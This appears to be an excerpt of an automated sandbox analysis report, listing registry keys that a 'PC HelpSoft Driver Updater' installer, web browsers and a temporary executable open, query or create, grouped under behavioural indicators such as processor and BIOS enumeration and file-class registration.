| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\000E | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0003 | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0004 | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0002 | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\UINumberDescFormat | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064\ | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0003 | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0003 | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceCharacteristics | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0002 | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceCharacteristics | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064\ | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ParentIdPrefix | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\LocationInformation | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ParentIdPrefix | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0009\ | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0004\ | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\LocationInformation | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0002\ | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0003 | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\000E\ | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0004 | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\000E\ | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0009 | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0009 | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Driver | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0004\ | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0003\ | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardManufacturer | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133757540314643467" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \Registry\User\.DEFAULT\Software\MemeSense | C:\Users\Admin\AppData\Local\Temp\04e16c855515880799c8.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\PCHelpSoftDriverUpdater.HDM_encrypted\DefaultIcon\ = "C:\\Program Files (x86)\\PC HelpSoft Driver Updater\\PCHelpSoftDriverUpdater.exe,0" | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\PCHelpSoftDriverUpdater.HDM_encrypted\shell\open | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Applications\PCHelpSoftDriverUpdater.exe\SupportedTypes | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\PCHelpSoftDriverUpdater.HDM_encrypted\ = "PC HelpSoft Driver Updater Protected File" | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\PCHelpSoftDriverUpdater.HDM_encrypted\shell\open\command | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\pchsdriver\shell\open | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\PCHelpSoftDriverUpdater.HDM_encrypted\shell\open\command | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Applications\PCHelpSoftDriverUpdater.exe\SupportedTypes\.HDM_encrypted | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\pchsdriver\ = "URL: Driver Updater Protocol" | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\PCHelpSoftDriverUpdater.HDM_encrypted | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Applications\PCHelpSoftDriverUpdater.exe\SupportedTypes | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\pchsdriver\shell | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Applications\PCHelpSoftDriverUpdater.exe | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\pchsdriver\URL Protocol | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.HDM_encrypted | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.HDM_encrypted\OpenWithProgids | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.HDM_encrypted\OpenWithProgids\PCHelpSoftDriverUpdater.HDM_encrypted | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\PCHelpSoftDriverUpdater.HDM_encrypted | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Applications | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\.HDM_encrypted\OpenWithProgids | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\PCHelpSoftDriverUpdater.HDM_encrypted\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
